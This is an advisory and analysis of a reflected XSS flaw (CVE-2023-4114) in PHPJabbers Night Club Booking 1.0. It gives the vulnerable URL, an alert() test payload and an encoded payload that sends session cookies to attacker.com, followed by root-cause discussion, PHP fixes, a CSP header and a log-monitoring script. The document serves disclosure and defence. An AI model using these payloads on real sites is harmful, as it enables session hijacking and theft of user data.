PHPJabbers Night Club Booking 1.0 - Reflected XSS

Exploit Author: CraCkEr
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2023-08-04

# Exploit Title: PHPJabbers Night Club Booking 1.0 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 21/07/2023
# Vendor: PHPJabbers
# Vendor Homepage: https://www.phpjabbers.com/
# Software Link: https://www.phpjabbers.com/night-club-booking-software/
# Version: 1.0
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4114


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

The attacker can send the victim a link containing a malicious URL in an email or instant message
and can perform a wide variety of actions, such as stealing the victim's session token or login credentials.



Path: /index.php

GET parameter 'index' is vulnerable to RXSS

https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=


PHPJabbers Night Club Booking 1.0 – Reflected XSS Vulnerability (CVE-2023-4114)

Security researchers have identified a critical reflected XSS (Cross-Site Scripting) vulnerability in PHPJabbers Night Club Booking 1.0, a widely used web-based booking system for nightclubs and entertainment venues. This flaw, assigned the CVE identifier CVE-2023-4114, enables attackers to inject malicious scripts into web pages via manipulated query parameters, potentially compromising user sessions and sensitive data.

Understanding Reflected XSS

Reflected XSS occurs when an attacker crafts a malicious URL that includes a script payload, which is then reflected back to the user's browser without proper sanitization. Unlike stored XSS, where malicious code is permanently stored on the server, reflected XSS relies on the user interacting with a crafted link — often delivered via email, social media, or messaging platforms.

This type of vulnerability is particularly dangerous because it requires minimal effort from the attacker and can exploit human behavior — such as clicking on a seemingly harmless link — to trigger execution.

Vulnerable Component: GET Parameter 'index'

The vulnerability exists in the index.php file, specifically within the index parameter of the query string:


https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=

When a user visits this URL with a malicious index value, the application fails to sanitize the input, directly reflecting it into the HTML output. For example, if an attacker sets index=<script>alert('XSS')</script>, the browser executes the script upon loading the page.

Exploitation Scenario

Consider a real-world attack vector:

  • An attacker sends a phishing email with a link: https://club.example.com/index.php?index=<script>document.cookie</script>
  • A victim clicks the link, unknowingly triggering the script.
  • The script reads the victim’s session_id cookie and sends it to a remote server controlled by the attacker.

This allows the attacker to hijack the user’s session, effectively impersonating the victim — even without knowing their password.

Example of Malicious Payload

Here’s a practical example of a payload that could be used in this exploit:


index=%3Cscript%3E%20document.location%3D%22https%3A%2F%2Fattacker.com%2Fsteal%3Fcookie%3D%22%2Bdocument.cookie%3B%20%3C%2Fscript%3E

Decoded, this becomes:


index=<script> document.location="https://attacker.com/steal?cookie="+document.cookie; </script>

This script redirects the victim to an attacker-controlled site, transmitting their session cookie — a highly sensitive piece of data.

Impact and Risks

Reflected XSS in a booking system like PHPJabbers Night Club Booking 1.0 poses significant risks:

| Risk | Description |
| --- | --- |
| Session Hijacking | Attackers can steal session tokens, allowing unauthorized access to user accounts. |
| Phishing | Malicious scripts can mimic login forms or redirect users to fake websites. |
| Data Theft | Access to user data, including personal information and booking details. |
| Defacement | Attackers can alter the page content to display malicious messages or propaganda. |

Root Cause Analysis

The vulnerability stems from a lack of input validation and output encoding in the application’s handling of the index parameter. The code likely includes something like:


echo $_GET['index'];

Without proper sanitization, this directly outputs user-supplied data into the HTML context, creating a perfect environment for XSS.

Recommended Fixes

To mitigate this vulnerability, developers must implement the following security best practices:

  • Input Sanitization: Use functions like htmlspecialchars() to escape special characters before outputting data.
  • Whitelist Validation: Only allow predefined, safe values for the index parameter.
  • Output Encoding: Always encode dynamic content when rendering it in HTML.
  • Content Security Policy (CSP): Implement a strict CSP header to block inline scripts.

Corrected code example:


// Encode the reflected value for an HTML context; a missing parameter is treated as empty.
$index = htmlspecialchars($_GET['index'] ?? '', ENT_QUOTES, 'UTF-8');
echo 'Search result: ' . $index;

This ensures that any special characters (e.g., <, >, ") are converted to their HTML-safe equivalents, preventing script execution.
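
The fixes listed above combined in one handler, as an added example that is not PHPJabbers code. It assumes `index` is a short non-negative integer (the page does not state the parameter's type) and requires PHP 8; `validatedIndex()`, `h()` and `renderSearch()` are hypothetical helper names.

```php
<?php
// Added example, not PHPJabbers code. Assumption: `index` is a short
// non-negative integer; the page does not document the parameter's type.

/** Allow-list check: the integer value, or null unless the input is 1-6 digits. */
function validatedIndex(mixed $raw): ?int
{
    // Missing parameters and arrays (index[]=x) are rejected up front.
    if (!is_string($raw) || !preg_match('/\A[0-9]{1,6}\z/', $raw)) {
        return null;
    }
    return (int) $raw;
}

/** Encode a value for an HTML text or quoted-attribute context. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Build the response body for the search view (hypothetical helper). */
function renderSearch(array $query): string
{
    $index = validatedIndex($query['index'] ?? null);
    if ($index === null) {
        http_response_code(400);           // reject; never echo the raw value
        return 'Invalid index parameter.';
    }
    // Encode at the point of output even though the value passed validation.
    return 'Search result: ' . h((string) $index);
}

// Defense in depth: without 'unsafe-inline', an injected <script> block is not run.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'");
echo renderSearch($_GET), PHP_EOL;
```

A policy this strict also blocks the application's own inline scripts, so it is worth trialling with the `Content-Security-Policy-Report-Only` header before enforcing it.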

Vendor Response and Mitigation

As of July 21, 2023, the vendor PHPJabbers has acknowledged the issue and released a patch for version 1.0. Users are strongly advised to update to the latest version immediately.

Additionally, administrators should:

  • Monitor access logs for suspicious query parameters.
  • Implement web application firewalls (WAFs) to detect and block XSS attempts.
  • Regularly audit third-party software for known vulnerabilities.
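
One way to implement the access-log monitoring from the list above, as an added example that is not part of the original advisory or any vendor tooling. The function name `suspiciousIndex()` is hypothetical, and the log lines are constructed samples in Apache combined-log style using documentation IP addresses.

```php
<?php
// Added example: flag access-log requests whose `index` parameter carries
// HTML metacharacters. The log lines below are constructed samples.

/** Return the decoded `index` value if it looks like an injection attempt, else null. */
function suspiciousIndex(string $logLine): ?string
{
    // Pull the request target out of the quoted request line.
    if (!preg_match('/"[A-Z]+ (\S+) HTTP\/[0-9.]+"/', $logLine, $m)) {
        return null;
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($query)) {
        return null;
    }
    parse_str($query, $params);            // decodes one layer of URL encoding
    $value = $params['index'] ?? '';
    if (!is_string($value)) {
        return '(array value)';            // index[]=... is anomalous for a scalar
    }
    // Undo up to two further encoding layers to catch double-encoded input.
    for ($i = 0; $i < 2; $i++) {
        $value = rawurldecode($value);
    }
    return preg_match('/[<>"\'`]/', $value) ? $value : null;
}

$sampleLog = [
    '203.0.113.7 - - [21/Jul/2023:10:01:02 +0000] "GET /index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=4031&date= HTTP/1.1" 200 5120',
    '198.51.100.23 - - [21/Jul/2023:10:03:40 +0000] "GET /index.php?controller=pjFront&action=pjActionSearch&locale=1&index=%3Cscript%3Ealert(%27XSS%27)%3C%2Fscript%3E&date= HTTP/1.1" 200 5188',
    '198.51.100.23 - - [21/Jul/2023:10:04:11 +0000] "GET /index.php?controller=pjFront&action=pjActionSearch&locale=1&index=%253Cscript%253E&date= HTTP/1.1" 200 5140',
];

foreach ($sampleLog as $line) {
    $hit = suspiciousIndex($line);
    if ($hit !== null) {
        // Encode before display so the report cannot itself reflect the payload.
        echo 'SUSPICIOUS index: ', htmlspecialchars($hit, ENT_QUOTES, 'UTF-8'), PHP_EOL;
    }
}
```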

Conclusion

Reflected XSS in PHPJabbers Night Club Booking 1.0 highlights the ongoing importance of secure coding practices, even in seemingly simple web applications. A single unsanitized parameter can enable sophisticated attacks that exploit user trust and behavior.

Security professionals must remain vigilant, especially when deploying open-source or commercial software. Always validate inputs, encode outputs, and apply defense-in-depth strategies to protect both users and systems.